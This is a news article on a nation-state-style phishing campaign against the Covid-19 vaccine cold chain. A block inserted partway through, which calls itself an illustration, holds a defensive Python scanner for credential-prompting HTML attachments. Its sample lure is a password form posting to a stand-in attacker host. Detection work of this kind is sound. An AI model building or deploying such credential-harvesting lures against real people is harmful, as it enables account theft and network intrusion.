Elements of the international vaccine supply chain are being targeted by a worldwide phishing campaign that is probably the work of a nation state-backed cyber attacker, according to IBM Security’s X-Force unit.
This development comes hot on the heels of a global alert issued by Interpol to its 194 member states, warning that malicious actors were tooling up to target organisations associated with Covid-19 vaccines.
The ongoing campaign is targeting organisations closely associated with the cold chain – part of the vaccine supply chain that ensures the safe preservation of vaccines in temperature-controlled environments during transit.
The cold chain will be critical for the deployment of two of the most promising Covid-19 vaccines, that developed by Pfizer/BioNTech, which needs to be kept at -70°C, and that developed by Moderna, which needs to be kept at -20°C.
The X-Force team said its analysis pointed to a “calculated operation” starting in September, spanning six countries and targeting organisations associated with international vaccine alliance Gavi’s Cold Chain Equipment Optimisation Platform (CCEOP).
It was unable to precisely attribute the campaign, but said that the precision targeting of key executives at relevant organisations bore the “potential hallmarks of nation-state tradecraft”.
IBM senior strategic cyber threat analyst Claire Zaboeva wrote: “While attribution is currently unknown, the precision targeting and nature of the specific targeted organisations potentially point to nation-state activity.
“Without a clear path to a cash-out, cyber criminals are unlikely to devote the time and resources required to execute such a calculated operation with so many interlinked and globally distributed targets. Likewise, insight into the transport of a vaccine may present a hot black-market commodity. However, advanced insight into the purchase and movement of a vaccine that can impact life and the global economy is likely to be a high-value and high-priority nation-state target.”
According to IBM X-Force, the attacker has been impersonating an executive at Haier Biomedical, a cold chain specialist, to target organisations including the European Commission’s Directorate General for Taxation and Customs Union, and companies in the energy, manufacturing, website creation and software and internet security sectors.
The spear-phishing emails targeted, in the main, executives in sales, procurement, IT and finance departments, but in some instances people in other parts of the organisation, too.
The subject lines are requests for quotations related to the CCEOP programme, but the emails instead contain malicious HTML attachments that open locally, prompting their victims to enter their credentials in order to view the file.
Their aim is almost certainly to harvest credentials, and so gain future access to corporate networks and data on vaccine distribution processes, methods and plans, such as information on how governments will get the Covid-19 vaccine into the hands of national health services.
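One way a mail gateway could flag the attachment pattern described above, added here as an illustration rather than code from IBM X-Force or the article; the trusted-host list and the sample lure are constructed assumptions:

```python
"""Heuristic scanner for HTML e-mail attachments that prompt for credentials.

Constructed example, not IBM X-Force's or the article's code. It flags the
pattern described above: a locally opened HTML file that asks the recipient
to log in before 'viewing' the document.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

TRUSTED_HOSTS = {"mail.example.com"}  # assumption: the organisation's own login hosts


class _CredentialFormParser(HTMLParser):
    def __init__(self):
        super().__init__()
        self.password_inputs = 0
        self.form_targets = []      # action attribute of every <form>
        self.script_posts = False   # inline JavaScript that may submit the form itself

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_inputs += 1
        elif tag == "form":
            self.form_targets.append(a.get("action") or "")

    def handle_data(self, data):
        # <script> bodies arrive here as raw data
        if "XMLHttpRequest" in data or "fetch(" in data:
            self.script_posts = True


def scan_html_attachment(html: str) -> list:
    """Return a list of findings; an empty list means nothing suspicious."""
    p = _CredentialFormParser()
    p.feed(html)
    findings = []
    if p.password_inputs:
        findings.append("password-field")
    for action in p.form_targets:
        host = urlparse(action).hostname
        if host and host not in TRUSTED_HOSTS:
            findings.append(f"form-posts-to:{host}")
    if p.password_inputs and p.script_posts:
        findings.append("script-submits-credentials")
    return findings


# Constructed sample resembling the lure described in the article.
SAMPLE = """<html><body><h2>Request for Quotation - CCEOP</h2>
<form action="https://attacker.invalid/collect" method="post">
Email <input name="u"> Password <input type="password" name="p">
<button>View document</button></form></body></html>"""
```

A real deployment would run this over every HTML attachment at the gateway and quarantine or warn on any non-empty finding list.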
Max Heinemeyer, director of threat hunting at Darktrace, said attacking the vaccine supply chain was likely to be easier for the perpetrators than going after the core targets in the healthcare sector.
“This particular effort to disrupt vaccine research and development confirms that the barrier between the ‘cyber’ and ‘physical’ supply chains has all but dissolved,” he said. “Attacks today can start in the inbox and end up disrupting the delivery chain of a critical vaccine or service.
“A single phishing attack is easy to conduct, but executing an orchestrated spear-phishing campaign against high-profile targets like this shows a lot of sophistication. The attack appears broad and sophisticated – broader than typical cyber crime campaigns that aim for quick monetisation.”
Although the goals of the campaign are, at this stage, merely speculation, Heinemeyer suggested that information about the physical whereabouts of vaccines that need to be kept extremely cold could be useful data for many nation states.
The fact that the campaign has been going on for some time is also a concern, he added. “Organisations need to get much better at detecting unusual digital activity at a far earlier stage, using cutting-edge defence technology – particularly artificial intelligence – across the entirety of their digital infrastructure,” he said.
Maria Namestnikova, head of Kaspersky’s Global Research and Analysis Team (GReAT) in Russia, said: “Threat actors are continuing to pivot and exploit the Covid-19 pandemic to carry out highly advanced cyber attacks with this latest attack on the Covid-19 vaccine. Recently, Kaspersky and several other cyber security companies have noted a growing interest on the part of APT threat actors in vaccine developments.
“During the first six months of research on a Covid-19 vaccine, there were only messages from Western intelligence agencies on the WellMess attacks against drug developers. Now, in just the past few weeks, the cyber security community has reported attempts to compromise researchers in the US, South Korea, Canada, France and India.
“Some of this activity is reported to have been linked to North Korean actors. In general, we believe that interest from APT actors in vaccine development will continue to grow, and that these attacks will be leveraged as part of a geopolitical strategy. Thus, false flags, for example, email addresses with a .ru domain – a technique already used by some threat actors – may be used to try to deflect suspicion from the attackers, leading to potential geopolitical disputes.”
IBM’s Zaboeva added: “IBM Security X-Force urges companies in the Covid-19 supply chain – from research of therapies, healthcare delivery to distribution of a vaccine – to be vigilant and remain on high alert during this time.
“Governments have already warned that foreign entities are likely to attempt to conduct cyber espionage to steal information about vaccines. Today, in conjunction with this blog, DHS CISA is issuing an alert encouraging organisations associated with the storage and transport of a vaccine to review this research and recommended best practices to remain vigilant.”